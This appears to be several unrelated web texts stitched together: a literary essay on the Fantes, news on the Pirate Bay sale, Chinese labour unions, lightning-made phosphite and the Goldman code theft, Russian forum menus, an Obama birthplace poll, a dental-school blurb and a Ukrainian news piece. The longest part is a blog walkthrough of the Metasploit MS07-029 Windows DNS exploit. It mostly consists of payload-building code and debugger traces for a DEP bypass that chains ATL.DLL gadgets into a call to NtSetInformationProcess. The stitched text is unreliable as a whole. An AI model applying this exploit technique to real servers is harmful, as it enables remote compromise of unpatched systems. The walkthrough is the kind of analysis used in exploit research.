Adolph Hitler , who sued Fante ’s publisher for an unauthorized publication of Mein Kampf and drained the firm ’s coffers of publicity money , derailed John Fante ’s literary career .
Dan Fante ’s enemy is far more insidious : People in the U.S. do n’t read anymore .
A few months ago I ordered , from the U.K. , all four issues of a magazine called The Savage Kick .
It ’s a very unusual literary journal for a couple of reasons .
The first is that it is published on a home laser printer .
The second is that all the short stories in it are worth reading .
Dan Fante is a spiritual godfather of sorts to the zine , and was also all over the first issue .
In a Savage Kick interview , he spoke of why it took so long to get published in America despite both talent and pedigree : “ Europeans are better readers …
I almost quit writing because I sent Chump Change out so many times , perhaps 40 , and had it been rejected by everyone .
Then a French publisher read it and sent me a note telling me how fine a work it was .
I literally fell to my knees when I read his letter . ”
It ’s still a hard road for Dan .
According to Bookscan , the entire Dan Fante backlist , eight titles in all , sold 85 copies in U.S. bookstores and discount joints since the beginning of this year .
Papa is doing a bit better ;
Ask the Dust alone sells that many copies every week .
The big Harper push , which will include reissues of Chump Change and the other Bruno Dante novels plus a new one called 86’d , has the potential to be a breakthrough , but also carries risk .
Can the Fante books be hand - sold by the 30 Borders employees who do n’t read .
“ If you liked The Purpose Driven Life , maybe you ’ll like Spitting Off Tall Buildings … ” Ask The Dust even had a chance a few years ago , thanks to a horrid film version , but today the Robert Towne effort is perhaps most remembered for Colin Ferrell ’s ass and Salma Hayek ’s tits .
( Really .
Turn off SafeSearch and type ask the dust into images.google.com .
You ’ll get a picture of a rock - hard butt before one of the book ’s cover . )
And , of course , the books are about jerks who do n’t finally get redeemed when they embrace middle - class lifestyles .
Ca n’t sell that , except to proletarian scum …
But this is an era of hope and change , and the thematic core of the work of both Fantes is the redemptive power of the written word .
As a swarthy and unsuccessful writer myself , I have high hopes and continue to have them even after years of eating ever so many fists of indifference .
For my day job , I attended Book Expo America in May and quickly ran to the Harper Collins pavilion once it opened .
Surely they ’d have galleys for 86’d , which comes out this September .
I could get a copy , spread the word .
But no .
Global economic crisis meant cutbacks — few publishers were giving out much .
BEA had little this year other than that damned giant Clifford the Big Red Dog balloon staring at me with its dead eyes !!!
If Rupert Murdoch ’s Mammoth Mass Marketing Machine is beginning to stir , I ’ve not felt any vibrations though my ear has been pressed close to the ground for years .
Even this essay is purely an individual exercise in fanboyism written without the assistance of publicity packages or press releases from which to crib quotes .
Some books are better sold than they are discovered .
The publishing industry , in many ways the last bastion of a production - centered manufacturing economy , knows what it wants .
However , it has never quite known what sells .
( If it did , BEA would have been full of freebies instead of chatter about layoffs ! )
Surprises have a way of bubbling up from under the surface .
If a bestseller is by definition a book purchased by people who do n’t buy books , a cult classic is by definition a book sold to the same person over and over again , to be handed out like tracts to convert the pagan and the heathen .
Well , true believers , there ’s been some kind of error at the plant and we ’ll have lots of tracts to hand out this Christmas season .
Jerks of the world , who ’s with me ?
But first , maybe a few drinks …
• 23 June 2009
The Swedish gaming executive who 's gambling nearly $ 8 million buying The Pirate Bay is convinced he can turn the 20 million users of the world 's most notorious file sharing site into well - behaved consumers — even amid a deluge of account - deletion requests .
" Some file - sharers do n't like all this money talk , and they 're leaving , " acknowledged Hans Pandeya , chief executive of the Global Gaming Factory , in a telephone interview with Wired.com on Wednesday .
But " the user experience is going to be the same .
From the user 's point of view , they 're doing a search , they 're finding the song or the movie , and they 're downloading it . "
There are other changes planned for that user experience , of course , once The Pirate Bay lowers the Jolly Roger and raises the flag of commerce — as early as next month .
The free video games , pre-release Hollywood blockbusters and gigabyte - length discographies that currently dominate the site 's most - popular list will be gone , replaced by whatever content the movie , music and software industries deign to sell — yes , sell — on the site they 've been battling for years .
Global Gaming Factory announced plans Tuesday to purchase The Pirate Bay 's BitTorrent site for $ 7.8 million .
The Pirate Bay 's other projects , including the upcoming streaming - video site TheVideoBay and the iPredator anonymizing service , are not part of the sale , the Bay 's current management said .
But the unfolding exodus from the Bay seems to be an early sign that file sharers are n't eager for change .
" Many people have asked about having their account removed , and we will not force anyone to stay on of course , " the site posted to its blog Tuesday .
Pandeya believes he 'll be able to stay the mutiny once the community — which he describes as the " key asset " in the announced purchase — fully understands what the new Pirate Bay will be offering .
That would be money , for starters .
The revamped Bay will be the first BitTorrent site to pay members cold hard cash for seeding the paid content they download — a sweetener that Pandeya said will give the site an edge even over established pay - content outlets .
" If you use iTunes , for instance , their users can't create any revenue , " he said .
" We can create revenue for the file - sharing community ....
At the end of the day , the file sharers will make money , or this is not going to work . "
Details , like how much uploaders will be paid for sharing their bandwidth , have n't been announced .
But it would need to be a lot to match the value lost to a community accustomed to getting $ 60 console games for the cost of a button - click .
It 's also unclear that the content industry will rush to embrace The Pirate Bay , a name as synonymous with piracy as Bill Gates is to Microsoft .
" We do n't know the details , and there are many questions to ask about how this will work in practice , " said John Kennedy , chairman of the International Federation of the Phonographic Industry .
The Motion Picture Association of America said the studios " do n't have enough information to comment at this time . "
Those content - producers will come around , said Pandeya .
" Hollywood has a community that they can't reach today .
There 's a lot of free file sharing going on , and Hollywood will want to reach them . "
The final plank in Pandeya 's plans involves a new improved version of the BitTorrent protocol under development by Peerialism , another Swedish company Global Gaming Factory purchased Tuesday .
In theory , it works like this :
When a Pirate Bay member purchases , for example , an authorized movie from the site , the user will download the film through the customized , " next generation " BitTorrent client .
Instead of that movie arriving piecemeal from other clients all over the world , the new application will favor peers geographically close to the consumer .
That would increase the speed of the download , lessen global bandwidth demands and ease ISPs ' exit traffic .
" We 're talking about upgrading BitTorrent and taking it to the next step , " Pandeya said .
Pandeya believes ISPs , looking to save on transit costs , will purchase the new technology themselves , to allow downloads on their networks to be smarter — providing The Pirate Bay with another income stream .
Advertising will also continue on the site , he said .
Members will also be able to share their own files , as they are now — though the new Pirate Bay will deploy filters to try to block infringing content .
ISPs might embrace the Peerialism - BitTorrent upgrade , said Craig Labovitz , chief scientist at Arbor Networks , provided Pirate Bay downloads continue to be a formidable traffic source .
Under the current BitTorrent model , " if a thousand people all pull the same file , the cable network may actually be paying for trans -Atlantic bandwidth , " said Labovitz .
" It costs them money and is limiting resources available for others . "
ISPs would also have to secure assurances that the protocol is n't another venue for pirated works , " Labovitz said .
Pandeya acknowledged that the future of the site depends entirely on keeping its current community happy .
The Pirate Bay , after all , is n't the only BitTorrent site .
" If file sharers are not happy , " he said , " they 'll just go to the next site . "
Image : Hans Pandeya , CEO of Global Gaming Factory X AB talks to the media Tuesday , June 30 , announcing the purchase of The Pirate Bay .
Photo credit : Maja Suslin/AP
See Also :
Trade union officials in the central province of Shaanxi have threatened the founders of a new workers ’ rights group , saying it is a “ reactionary organization ” that could harm China ’s “ Harmonious Society , ” Radio Free Asia ( RFA ) reported on 29 June .
More than 380 workers from some 20 enterprises in Shaanxi applied to the provincial Party committee and trade union federation to set up the Shaanxi Enterprise Union Rights Defence Representative Congress , or , “ rights defence congress ” for short .
The main goals of the proposed congress would be to put workers in control of enterprise unions , and to supervise or monitor the government , enterprises , and the activities of union employees .
By building on the current employees ’ representative conference system , the organization would supervise existing unions , and report on important issues , such as problems in enterprise reform , bankruptcy , and the unlawful activities of grassroots union officials .
Congress founders said that the impetus for setting up such an organization came from the fact that workers could not collectively get justice through the courts and that petitioning was a dead end .
They added that the organization would not advocate petitioning or road blocks as a means of solving problems .
Rather the congress would seek to resolve issues by creating effective unions .
Although the application was sent in to the Party , government and the union offices over two months ago , no official response has been given .
Radio Free Asia contacted the Shaanxi Federation of Trade Unions about the status of the application , but , after being redirected to the union ’s organization department , the department refused to answer the phone .
RFA reported however that some of the application signatories had been threatened by union officials who claimed the rights defense congress was a “ reactionary organization , ” linked with foreign hostile forces .
Union officials also accused the signatories of harming the “ Harmonious Society . ”
The likely suppression of such an organization - one that could give voice to workers ’ demands and interests - is fully in line with the “ vicious circle ” of how labour disputes turn into social conflict , as outlined in China Labour Bulletin ’s research report Protecting Workers ’ Rights or Serving the Party : The Way Forward for China ’s trade unions , ( Figure 1 on page 7 ) .
In this vicious circle , workers who lack effective representation in the workplace are forced to stage protests , strikes and demonstrations in an attempt to get the government to intercede .
In order to maintain social stability , the government uses a combination of pressure and persuasion to resolve these disputes including the suppression of workers ’ demands for setting up real unions or rights organizations .
This in turn reinforces the lack of effective worker representation at the grassroots level , leading to more disputes in the future .
The high energy of a lightning strike creates an unusual form of phosphorus once common on primordial Earth and still used by many microbes today .
Phosphorus forms the DNA molecule 's spine , enrobes every living cell as a constituent of their membranes , and is a key component of bones and teeth .
Author Isaac Asimov once called phosphorus " life 's bottleneck , " because it makes up 1 percent of an organism but is only present in 0.1 percent of minerals on Earth .
Today , most phosphorus enters the world 's ecosystems as granite and other rocks weather over time , releasing the molecule orthophosphate : a phosphorus atom linked to a hydrogen and four oxygens .
But with little oxygen in the early atmosphere , ancient microbes evolved a very different chemical pathway to break down orthophosphate into phosphite , a reduced form of phosphorus that has just three oxygens .
Because little phosphite exists in nature today , scientists have long wondered why many microbes still make the enzymes needed to digest it .
Geologist Matthew Pasek of the University of Arizona in Tucson , who previously studied the possibility that early life used phosphorus from iron meteorites , knew that cloud - to - ground lightning was one of the few natural phenomena that could produce enough energy to create phosphite .
When a bolt strikes the soil it burns a molten , hollow tube called a fulgurite that Pasek says looks like a " mini volcano with glass splattered around it . "
These fulgurites , which range from a few grams up to tens of kilograms , are not easy to find , and meteorite dealers often pay nomads in the Sahara Desert to collect them during their travels .
For a couple hundred dollars each , Pasek purchased fulgurites from around the world on eBay , at the Tucson Gem Show , and through other sources
Then , he crushed the rocks up to analyze what type of phosphorus molecules they contained : Fulgurites found in organic soils contained about 22 percent of their phosphorus as phosphite , whereas other fulgurites taken from soil lacking organic material had 37 to 68 percent of their phosphorus in another oxygen - poor form linked to iron .
The results were published this week in Nature Geoscience .
( Scientific American is part of the Nature Publishing Group . )
" When lightning strikes , it acts like a mini smelter , and the organic molecules strip off oxygen from the phosphorus , " Pasek says .
But just how significant is lightning to the global phosphorus cycle ?
Lightning strikes Earth 44 times every second , which means it could produce just 2,000 to 3,000 kilograms of phosphite yearly .
Today , humans introduce thousands of times that amount of phosphite through the corrosion of steel and rusting of old cars .
For that reason , John Quinn , a microbiologist at Queen 's University Belfast in Northern Ireland , says that Pasek 's findings are " more interesting than important . "
Even so , he is impressed by the study and hopes it spurs geologists to look for more significant sources of phosphite in the environment .
So far , Pasek is the only taker .
" There have been a lot of biologists saying there has to be a geological source of reduced phosphorus , and geologists say phosphorus is kind of boring , " he says .
If fulgurites are n't the only source of reduced phosphorus , they are at least the most striking one .
And this accused spy did n't hack just any old codes .
He got his hands on prized data , the algorithm used to execute Goldman ’s rapid - fire stock and commodity trades .
It ’s sophisticated code that tells computers to buy or sell stocks as they rise and fall across key technical levels .
And it ’s code that generates many millions of dollars of profits every year .
And like every spy movie worth its salt , the suspect in custody says he did n't do it .
( Well in this case , he did it , but says he did n't mean to . )
Nope , 39 - year old Sergey Aleynikov insists he did not intend to break the law – he was n’t planning to sell the codes to our enemies – not even to Goldman ’s rivals .
Instead he says , he merely uploaded more data than intended .
Whether he's the victim of an innocent mistake or involved in something rather sinister one thing is very clear .
The case is certain to raise questions about the security of Wall Street computer systems going forward .
And it could well force Goldman to go public with the innermost secrets of their much envied trading system .
Read More :
> Ex-Goldman Programmer Out On Bail In Theft Case
______________________________________________________
Got something to say ?
Send us an e-mail at fastmoney-web@cnbc.com and your comment might be posted on the Rapid Recap !
If you 'd prefer to make a comment but not have it published on our website send your message to fastmoney@cnbc.com .
Trader disclosure :
On July 7th , 2009 , the following stocks and commodities mentioned or intended to be mentioned on CNBC ’s Fast Money were owned by the Fast Money traders : Terranova Owns ( MSFT ) , ( XBI ) , ( ABT ) ; Terranova Owns ( UNG ) Puts ; Adami Owns ( AGU ) , ( C ) , ( GS ) , ( INTC ) , ( MSFT ) , ( NUE ) , ( BTU ) ; Finerman Owns ( TBT ) , ( RIG ) ; Finerman 's Firm Owns ( FCN ) , ( MSFT ) , ( NOK ) , ( PBR ) , ( RIG ) , ( TBT ) , ( WMT ) , ( FLS ) ; Finerman 's Firm Owns ( BAC ) Preferred ; Finerman Owns ( BAC ) Preferred ; Finerman 's Firm Is Short ( BAC ) , ( IYR ) , ( IJR ) , ( MDY ) , ( SPY ) , ( USO ) ; Seymour Owns ( AA ) , ( AAPL ) , ( BAC ) , ( BX ) , ( DRY ) , ( EEM ) , ( FXI ) , ( INFY ) , ( SBUX ) ; Seymour 's Firm Is Short ( PBR ) ; Seymour 's Firm Owns ( FCX ) , ( NOK )
Ваши права в раздел е
Вы не можете создавать новые тем ы
Вы не можете отвечать в тема х
Вы не можете прикреплять вложени я
Вы не можете редактировать свои сообщени я BB коды Вкл. Смайлы Вкл. Вкл. [ IMG ] код HTML код Выкл .
Правила форум а
Быстрый перехо д
Мой кабинет Личные сообщения Подписк и
Кто на форум е
Поиск по форум у Главная страница форума Основной раздел Новости Новости " винил а " Фотообзоры и отзывы Частные коллекци и В помощь коллекционеру Полезная информация Обсуждение фигурок Модификация фигурок Собственные проекты Ремон т Где купить Свободные темы Общение Культурные посиделки Кино Конкурсы Лучшая фотография месяц а Обсуждение и предложение конкурсов Частные объявления Услуги Форум Поддержк а
[ Update ( 6/30/10 ) : Serious questions have been raised about the validity of Research 2000 's polls .
The results below should thus be viewed as potentially suspect until the matter is resolved . ]
Via Matthew Yglesias and Taegan Goddard , a new Daily Kos-sponsored poll from Research 2000 finds that only 77 % of Americans , and 42 % of Republicans , believe Obama was born in this country -- a result that suggests the Obama birth certificate myth has circulated more widely than previously thought .
Here are the details :
Research 2000 for Daily Kos. 7/27-30 .
All adults .
MoE 2 %
Do you believe that Barack Obama was born in the United States of America or not ?
Yes 77
No 11
Not sure 12
And here are the partisan and regional breakdowns , which show that the false belief that Obama was not born in this country is most commonly held by Republicans and residents of the South :
Yes No Not sure
Dem 93 4 3
Rep 42 28 30
Ind 83 8 9 Northeast 93 4 3
South 47 23 30
Midwest 90 6 4
West 87 7 6
To put these numbers in perspective , we can compare them to the most recent Pew poll on the prevalence of the false belief that Obama is a Muslim ( click on the chart for a larger version ) :
As you can see , there 's good news and bad news .
The good news is that the number of correct responses is much higher on the citizenship question than the religion question .
On the other hand , the proportion of incorrect answers is also much higher on the citizenship question among Republicans , which suggests that the encouragement of the birth certificate myth by conservative pundits and Republican politicians has begun to activate the GOP base on this issue .
I 'm not sure if Michael Steele is going to be able to make this " unnecessary distraction " go away any time soon .
( Methodological details :
The chart above describes responses saying Obama was born in the U.S. or not as " citizen " / " non- citizen , " which should be interpreted as shorthand for whether he is believed to be a natural - born citizen .
It also groups all responses other than " Christian " and " Muslim " from the Pew poll into a " Do n't know " category , including the 6 % of respondents who refused to answer the question among the general population and the unknown proportion of Republicans who refused to do so . )
( Cross - posted with minor edits at Pollster.com )
Update 7/31 11:53 AM : I 've rewritten this post for coherence to avoid including multiple updates .
There are many things that make dental assisting a desirable profession .
A respectable salary , a high level of demand in any community , and job security even during a changing economy all make dental assisting a great occupation to pursue .
Pursuing your dental assistant education can open the door to other occupations within healthcare , such as becoming a dental hygienist , going back to school to become a dentist , or using your skills in some other healthcare occupation .
On this site you can find accredited dental assistant schools , research dental assistant training options , read about how to become certified , learn how dental assisting school accreditation works and why it ’s important , and explore the dental assisting courses you ’ll complete while in school .
You can also search dental assistant job listings to find the career you want .
Researching your training options is a great first step to having a
За хранение порнографии теперь светит до 3 лет тюрьм ы
На этой недел е
Рада решила всерьез заняться моральным здоровьем украинцев .
Не успели депутаты отдышаться после запрета игорного бизнеса в стране , как появилось очередное высоконравственное решени е
Рады - борьба с порно по всем фронтам .
Если раньше сажали за изготовление и распространение , то теперь , по новой версии ст .
301 УК , записана ответственность и за хранение порнографических материалов .
Эксперты уверены : решение о том , чтоб вовсе запретить хранение порнографии , - курьез .
Международные конвенции о защите прав ребенка , к которым присоединилась Украина , вынуждал и
Раду ввести уголовную ответственность за хранение детской порнографии .
Но Минюст ( он - то и вносил законопроект на рассмотрение ) подстраховался .
Правозащитники успели раскритиковать принятый закон : считают , что он открывает милиции свободу « шить дела » против обычных людей по поводу и без повода .
- Отныне любой диск , фото , журнал с эротическими изображениями может стать основанием для уголовной ответственности , - говорит сопредседател ь
Харьковской правозащитной группы Евгений Захаров .
- Необходимо писать письма президенту , чтобы он воспользовался своим правом вето и уточнил квалификацию преступления .
И при этом действовать срочно …
Но решится ли президент на столь « безнравственный » поступок , неизвестно .
Тем более накануне выборов .
Едва ли он прислушается даже к мнению министра внутренних дел , который тоже засомневался , поняли ли депутаты , за что , собственно , голосовали .
- Если порнография становится уголовно запрещенной для хранения , почему проституция у нас карается смешными штрафными санкциями ?
Если в натуре - 120 гривен , а на экране - 3 года ( тюрьмы . - Авт. ) , это как -то несерьезно , - заметил Юрий Луценко . - Нужно ли карать уголовно людей , которые дома балуются порнографией ?
Я , например , не уверен …
Люди бывают разные .
Возможно , у них это последнее ...
Интересное дело .
Борьба за общественную нравственность всегда начинается накануне выборов .
Напомним , в конце 2005 года - тоже перед парламентскими выборами - Рада решила запретить курение в общественных местах .
А накануне президентских выборов - 2004 Кучма создал экспертную комиссию по вопросам защиты общественной морали .
В чем же дело ?
Почему как раз в канун очередной избирательной кампании политики начинают волноваться , все ли в порядке с нравственным здоровьем общества ?
Очевидно , сами боятся прослыть аморальными .
Голосуют за подобные законопроекты , даже если понимают , что тем самым решают гораздо меньше проблем , чем создают .
Кстати , игорным бизнесом и порно в
Раде ограничиваться не намерены .
На рассмотрении новый законопроект - о запрете пить пиво в общественных местах …
After I described how to exploit MS07-029 vulnerability on Windows 2003 Server SP1 / SP2 , now I will post about it again but in the different technique .
In this post I will describe how to bypass hardware - enforced DEP or NX on Windows 2003 Server SP1 / SP2 instead of software DEP ( SafeSEH issue ) .
However , because I have no NX support machine , so something will be missed and It ’s very helpful if you help me to correct things .
msdns_zonename.rb
Windows 2003 Server SP1 - SP2 English ' , { ' OS ' => ' 2003SP12 ' , ' Off ' => 1633 , ' IB ' => 0x76a80000 }
Now , before I go to the debugging process , I have to review some exploit code to see how it ’s work .
As other posts , I usefrom http://www.metasploit.com as the exploit code to research .
This is the return address section of Windows 2003 Server SP1 / SP2 target :
0x76a80000
0:011 > ! lmi 76a80000
Loaded Module Info : [ 76a80000 ]
Module : ATL
Base Address : 76a80000
Image Name : C: \WINDOWS \System32\ ATL.DLL
...
ATL.DLL
0x76a80000
off = mytarget [ ' Off ' ]
ib
= mytarget [ ' IB ' ]
txt [ off ] = [ ib + 0x2566 ].pack ( ' V ' )
Something has changed from the old one .
The return address of Windows 2000 and 2003 SP0 are called Ret and Rets , however , the return address in this target is called IB ( Image Base ) .
What ’s the image that start at the address
It ’s the image base ofand start at .
Then I go to the code of Windows 2003 SP1 / SP2 exploitation section
First , it set the payload to 0x76a80000 + 0x2566 = 0x76a82566 at the 1633th byte of the payload :
0:011 > u 0x76a82566
ATL !AtlModuleUpdateRegistryFromResourceD+0x19b :
76a82566 add ebp,5ACh
76a8256 c leave
76a8256d ret 14h
At the address 0x76a82566 is the instruction that add some value to ebp , switch value between ebp/esp and pop value of esp to ebp , then jump to the address on esp .
Then , when I lookup the rest of code , I decide to step into the debugging process because it ‘s quite difficult to understand what the exploit code does .
I run the exploit and the debugger give the same result on other target :
( 1f4.6d0 ) : Access violation - code c0000005 ( first chance )
First chance exceptions are reported before any exception handling .
This exception may be expected and handled .
eax=00169f0e ebx=013a0000 ecx=00007a69 edx=013a0000 esi=00000003 edi=00169f0b
eip=01015462 esp=0139f6ac ebp=0139f6b0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
dns!extractQuotedChar+0x3 b :
01015462 mov byte ptr [ edx ] , cl ds:0023:013a0000 = ??
After this phase , the exception handler will be called to handle the exception :
…
ntdll!ExecuteHandler2+0x24 :
7c828750 call ecx {ATL!AtlModuleUpdateRegistryFromResourceD+0x19 b ( 76a82566}
0:012 > bp 76a82566
0:012 > p
Breakpoint 0 hit
ATL !AtlModuleUpdateRegistryFromResourceD+0x19b :
76a82566 add ebp,5ACh
Could you remember 0x76a82566 ?
Yep , it is the fake return address in our payload that overwrite the SEH handler on the stack .
It is also can bypass the SafeSEH protection ( software DEP on Windows ) because the ATL.DLL is complied with the older version of SafeSEH and the protection is broken .
Then I continue the debugging process :
ATL !AtlModuleUpdateRegistryFromResourceD+0x1a1 :
76a8256 c leave
0:012 > p
eax=00000000 ebx=00000000 ecx=76a82566 edx=7c828766 esi=00000000 edi=00000000
eip=76a8256d esp=0189f8b4 ebp=6f51626a iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
ATL !AtlModuleUpdateRegistryFromResourceD+0x1a2 :
76a8256d ret 14h
0:012 > dd esp
0189f8b4 76a81da7 46356579 42387556 7a726759
The flow of execution will jump to 0x76a81da7 .
Where ’s 0x76a81da7 come from ?
It ’s in the code line :
txt [ off + 4 , 4 ] = [ ib + 0x1da7 ] .pack ( ' V ' )
What does this return address do ?
It ’s pop the value from the stack and store at esi , then return .
0:012 > u
ATL !ATL::CExpansionVector::CExpansionVector+0x1a :
76a81da7 pop esi
76a81da8 ret
0:012 > p
eax=00000000 ebx=00000000 ecx=76a82566 edx=7c828766 esi=000000ed edi=00000000
eip=76a81da8 esp=0189f8d0 ebp=6f51626a iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
ATL !ATL::CExpansionVector::CExpansionVector+0x1b :
76a81da8 ret
The value 0xed stored in esi come from the code in this line :
txt [ off + 28 , 4 ] = [ 0xed ] . pack ( ' V ' )
Then the process will jump to 0x76a81d a4 : which coded in line :
txt [ off + 32 , 4 ] = [ ib + 0x1da4 ] .pack ( ' V ' )
...
ATL !ATL::CExpansionVector::CExpansionVector+0x1b :
76a81da8 ret
0:012 > dd esp
0189f8d0 76a81da4 7ffe0300 63685572 76a8109c
...
0:012 > u
ATL !ATL::CExpansionVector::CExpansionVector+0x17 :
76a81da4 pop ecx
76a81da5 mov eax , esi
76a81da7 pop esi
76a81da8 ret
0:012 > dd esp
0189f8d4 7ffe0300 63685572 76a8109 c 7970574f
76a81da4 pop ecx
0:012 > p
eax=00000000 ebx=00000000
ecx=7ffe0300
edx=7c828766 esi=000000ed edi=00000000
eip=76a81da5 esp=0189f8d8 ebp=6f51626a iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
ATL !ATL::CExpansionVector::CExpansionVector+0x18 :
76a81da5 mov eax , esi
0:012 > p
Breakpoint 1 hit
eax=000000ed
ebx=00000000 ecx=7ffe0300 edx=7c828766 esi=000000ed edi=00000000
eip=76a81da7 esp=0189f8d8 ebp=6f51626a iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
The instructions at address 0x76a81da4 are the series of instruction that pop the value from the stack and then jmp to the address on the stack :
ATL !ATL::CExpansionVector::CExpansionVector+0x1a :
76a81da7 5e pop esi
0:012 > p
eax=000000ed ebx=00000000 ecx=7ffe0300 edx=7c828766 esi=63685572 edi=00000000
eip=76a81da8 esp=0189f8dc ebp=6f51626a iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
ATL !ATL::CExpansionVector::CExpansionVector+0x1b :
76a81da8 ret
Now , eax is set to 0xed and ecx is set to 0x7ffe0300 , then jump to 0x76a8109c :
eax=000000ed ebx=00000000 ecx=7ffe0300 edx=7c828766 esi=63685572 edi=00000000
eip=76a8109c esp=0189f8e0 ebp=6f51626a iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
ATL !AtlComQIPtrAssign+0x23 :
76a8109c call dword ptr [ ecx ] ds:0023:7ffe0300={ntdll!KiFastSystemCall ( 7c8285e8 ) }
The value 0x7ffe0300 is in the code line :
txt [ off + 36 , 4 ] = [ 0x7ffe0300 ] .pack ( ' V ' )
and 0x76a8109 c in the line :
txt [ off + 44 , 4 ] = [ ib + 0x109 c ].pack ( ' V ' )
But … what is the address 0x7ffe0300 ?
It ’s look like the pointer to some location ( 0x7c8285e8 ) .
I ’ve found the answer in this blog .
The address 0x7ffe0300 is the offset + 0x300 from KUSER_SHARED_DATA
structure and it ’s something for system call issue :
0:007 > dt ntdll !
_KUSER_SHARED_DATA
…
+0x2f8 TestRetInstruction : Uint8B
+0x300 SystemCall : Uint4B
+0x304 SystemCallReturn : Uint4B
Now the flow of execution transfer to 0x7c8285e8 – ntdll!KiFastSystemCall :
0:012 > u
ntdll!KiFastSystemCall :
7c8285e8 8bd4 mov edx,esp
7c8285ea 0f34 sysenter
After jump to 0x7c8285e8 – ntdll !KiFastSystemCall , the process will move value from esp to edx and run sysenter instruction .
But wait … what is sysenter instruction -*- ?
After I search through the google , I ’ve found the interesting article Windows syscall shellcode .
In summary , sysenter is the instruction that execute the “ system call ” of Microsoft Windows operating system – switch to ring 0 level – the kernel mode .
The eax value is the system call number to be executed – in this case 0xed .
What is the system call number 0xed ?
It is NtSetInformationProcess ( search at http://www.metasploit.com/users/opcode/syscalls.html).
The parameter of sysenter is passed to NtSetInformationProcess by edx .
It points to the return address after execute the sysenter command and the array of argument that pass to the system call – NtSetInformationProcess in this case .
ntdll!KiFastSystemCall :
7c8285e8 8bd4 mov edx,esp
0:012 > p
eax=000000ed ebx=00000000 ecx=7ffe0300 edx=0189f8dc esi=63685572 edi=00000000
eip=7c8285ea esp=0189f8dc ebp=6f51626a iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
ntdll!KiFastSystemCall+0x2 :
7c8285ea 0f34 sysenter
0:012 > dd edx
0189f8dc 76a8109e 7970574f ffffffff 00000022
0189f8ec 7ffe0270 00000004 32395052 55434731
The value 0x76a8109e is the return address after execute sysenter instruction .
The next 4 bytes are something that you can ignore .
The next 16 bytes are the parameters passed to NtSetInformationProcess which in this line of code :
txt [ off + 52 , 16 ] = [ - 1 , 34 , 0x7FFE0270 , 4 ] .pack ( ' VVVV ' )
So the process will call NtSetInformationProcess like this :
NtSetInformationProcess ( - 1 , 0x22 , 7ffe0270 , 4 )
- 1 : process handler .
Pass - 1 means NtCurrentProcess
0x22 : ProcessExecuteFlags
7ffe0270 : Address of Execute Flags which should point to 0x2
4 : size of Execute Flags
In paper from uninformed.org , calling NtSetInformationProcess with these parameters will disable hardware - enforced DEP or NX .
Before continue , I have to understand the meaning of 0x22 and 0xffe0270 .
What ’s the value 0x22 for ProcessExecuteFlags parameter .
The answer is in this google group
0:007 > dt _KEXECUTE_OPTIONS
ntdll !_KEXECUTE_OPTIONS
+0x000 ExecuteDisable : Pos 0 , 1 Bit
+0x000 ExecuteEnable : Pos 1 , 1 Bit
+0x000 DisableThunkEmulation : Pos 2 , 1 Bit
+0x000 Permanent : Pos 3 , 1 Bit
+0x000 ExecuteDispatchEnable : Pos 4 , 1 Bit
+0x000 ImageDispatchEnable : Pos 5 , 1 Bit
+0x000 Spare : Pos 6 , 2 Bits
The value 0x22 when represented in binary format will be 0x0010 0010 .
So the bits that enable are Pos 1 ( ExecuteEnable ) and Pos 5 ( ImageDispatchEnable ) .
So , calling NtSetInformationProcess will let the whole areas of the image are executable .
Then , turn to 0x7ffe0270 .
What ’s it ?
I know it ’s the pointer to 0x2 value :
0:007 > dd 7ffe0270
7ffe0270 00000002 01010000 00010000 00010001
And it ’s the offset +0x270 from KUSER_SHARED_DATA
0:007 > dt ntdll !
_KUSER_SHARED_DATA
+0x26c NtMajorVersion : Uint4B
+0x270 NtMinorVersion : Uint4B
+0x274 ProcessorFeatures : [ 64 ]
UChar
The address 0x7ffe0270 is a pointer to NtMinorVersion which is 0x2 .
The word “ NtMinorVersion ” lets me remember something .
It ’s a minor version number of Windows 2003 Server operating system ( Windows 2003 Server version is 5.2 ) .
Then I verify my assumption by look at the value that 0x7ffe026c – NtMajorVersion – point to .
0:007 > dd 0x7ffe026
c
7ffe026 c 00000005 00000002 01010000 00010000
It points to 0x5 which is major version number of Windows 2003 Server operating system .
Now back to the analysis process .
After the call of NtSetInformationProcess , the NX would be disabled and the flow of execution is transferred to 0x76a8109e – after the call dword ptr [ ecx ] instruction at 0x76a8109c
ATL !AtlComQIPtrAssign+0x25 :
76a8109e test edi,edi
When back to 0x76a8109e , the process executes 2 - 3 instructions and then crash again at 0x76a810a8 – ATL !
AtlComQIPtrAssign+0x2f :
ATL !AtlComQIPtrAssign+0x2f :
76a810a8 mov eax , dword ptr [ esi ] ds:0023:6447504f=????????
And then our fake exception handler is called again :
ntdll!ExecuteHandler2+0x24 :
7c828750 call ecx {ATL!AtlModuleUpdateRegistryFromResourceD+0x19 b ( 76a82566 ) }
ATL !AtlModuleUpdateRegistryFromResourceD+0x19b :
76a82566 add ebp,
5Ach
ATL !AtlModuleUpdateRegistryFromResourceD+0x1a1 :
76a8256 c leave
ATL !AtlModuleUpdateRegistryFromResourceD+0x1a2 :
76a8256d ret 14h
0:007 > dd esp
0139 fae8 76a935 bf 696e504a 77434a69 46555951
The value 0x76a935 bf on the stack is in line :
txt [ off , 4 ] = [ ib + 0x135 bf ].pack ( 'V ' )
and its purpose is to execute the jmp esp instruction .
0:007 > p
eax=00000000 ebx=00000000 ecx=76a82566 edx=7c828766 esi=00000000 edi=00000000
eip=76a935bf esp=0139fb00 ebp=4242666d iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
ATL!__pfnDliNotifyHook2 ( ATL+0x135bf ) :
76a935 bf jmp esp { 0139fb00}
0:007 > dd esp
0139fb00 cccccccc 047f0566 43d43924 b2fc3b46
